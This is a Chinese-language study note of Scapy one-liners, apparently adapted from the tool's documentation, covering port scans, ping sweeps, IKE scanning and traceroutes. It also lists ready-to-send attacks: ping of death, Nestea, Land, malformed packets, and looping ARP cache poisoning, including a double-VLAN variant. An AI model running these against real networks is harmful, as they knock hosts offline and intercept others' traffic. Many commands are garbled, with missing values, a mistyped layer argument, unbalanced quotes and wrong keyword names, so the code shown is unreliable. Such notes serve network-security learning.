scapy官方文档

https://thepacketgeek.com/scapy-p-04-looking-at-packets/

http://biot.com/capstats/bpf.html   filter语法

http://www.secdev.org/projects/scapy/doc/usage.html#first-steps

http://www.cnblogs.com/xuanhun/p/5802573.html

https://fossies.org/dox/scapy-2.3.1/classscapy_1_1arch_1_1pcapdnet_1_1L2dnetSocket.html  源码

Simple one-liners

• ACK Scan
  • 　ans, unans = sr(IP(dst="www.slashdot.org")/TCP(dport=[80,666],flags="A"))
  • 　我们发现未过滤的端口（在响应数据包)

for s,r in ans:
    if s[TCP].dport == r[TCP].sport:
        print str(s[TCP].dport) + "is unfiltered"

发现过滤的端口（在未响应的数据包）

for s in unans:
    print str(s[TCP].dport) + "is filtered"

• Xmas Scan

ans, unans = sr(IP(dst="192.168.1.1")/TCP(dport=,flag="FPU"))
检测到RST响应。则揭露在目标的关闭端口

• IP Scan

ans, unans = sr(IP(dst="192.168.1.1",proto=(,))/"SCAPY",retry=)
探测支持的协议

• ARP Ping

ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.1.0/24"),timeout=)
发现网络中存活的主机

ans.summary(lambda(s,r): r.sprintf("%Ether.src% %ARP.psrc%"))
显示存活主机的IP和mac地址

或者执行：
 arping("192.168.1.*)

• ICMP Ping

ans, unans = sr(IP(dst="192.168.1.1-254")/ICMP())
ans.summary(lambda(s,r): r.sprintf("%IP.src% is active"))

• TCP Ping

ans, unans = sr(IP(dst="192.168.1.*")/TCP(dport=80,flag="S"))
如果主机有防火墙，那么可以尝试TCP Ping。
ans.summary(lambda(s,r): r.sprintf("%IP.src% is alive"))

• UDP Ping

If all else fails there is always UDP Ping which will produce ICMP Port unreachable errors from live hosts. Here you can pick any port which is most likely to be closed, such as port 0:

ans,unans = sr(IP(dst="192.168.*.1-10")/UDP(dport=0))

Once again, results can be collected with this command:
ans.summary(lambda(s,r): r.sprintf("%IP.src% is alive"))

• Classical attacks

畸形包：
send(IP(dst="10.1.1.5",ihl=2,version=3)/ICMP())
死亡之ping:
send（fragment(IP(dst="10.0.0.5")/ICMP()/("X"*60000)))
Nestea attack:
 send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*10))
 send(IP(dst=target, id=42, frag=48)/("X"*116))
 send(IP(dst=target, id=42, flags="MF")/UDP()/("X"*224))

Land attack:
 send(IP(src=target,dst=target)/TCP(sport=135,dport=135))

• ARP cache poisioning

典型的ARP缓冲毒化
send(Ether(dst=clientMAC)/ARP(op="who-has",psrc=gateway,pdst=client),inter=RandNum(10,40),loop=1)

ARP cache poisoning with double 802.1q encapsulation:
send(Ether(dst=clientMAC)/Dot1Q(vlan=1)/Dot1Q(vlan=2)/ARP(op="who-has",psrc=gateway,pdst=client),inter=RandNum(10,40),loop=1)

• TCP Port Scanning

发送一个TCP SYN在每个端口。等待一个SYN-ACK或者一个RST或者一个ICMP错误：
res,unans = sr(IP(dst="target")/TCP(flags="S",dport=(1,1024))

可能的结果：开放端口
res.summary(lfilter=lambda(s,r): (r.haslayer(TCP) and (r.getlayer(TCP).flags & 2)))

• IKE Scanning

IKE ----因特网密钥交换协议

尝试辨认出VPN的接线器通过发送ISAKMP Association proposal(密钥管理协议）并且接受这回答：

res, unans = sr(IP(dst="192.168.1.*")/UDP()/ISAKMP(init_cookie=RandString(8),exch_type="identity prot.")/ISAKMP_payload_SA(prop=ISAKMP_payload_Proposal())

可视化的结果：
res.nsummary(prn=lambda(s,r): r.src, lfilter=lambda(s,r): r.haslayer(ISAKMP))

• TCP SYN tracerute

ans, unans = sr(IP(dst="4.2.2.1",ttl(1,10))/TCP(dport=53,flags="S“）)
可能的结果：
ans.summary(lambda(s,r): r.sprintf("%IP.src%\t{ICMP:%ICMP.type%}\t{TCP:%TCP.flags%}"))
192.168.1.1     time-exceeded
68.86.90.162    time-exceeded
4.79.43.134     time-exceeded
4.79.43.133     time-exceeded
4.68.18.126     time-exceeded
4.68.123.38     time-exceeded
4.2.2.1         SA

• UDP traceroute

UDP由于没有握手，我们需要给一个应用载体（DNS,ISAKMP,NTP等）来得到响应：
res,unans = sr(IP(dst="target", ttl=(1,20))/UDP()/DNS(qd=DNSQR(qname="test.com"))

使用下面的代码来得到路由：
res.make_table(lambda(s,r): (s.dst, s.ttl, r.src))

• DNS traceroute

ans,unans = traceroute("4.2.2.1",14=UDP(sport=RandShort())/DNS(qd=DNSQR(qname="thesprawl.org")))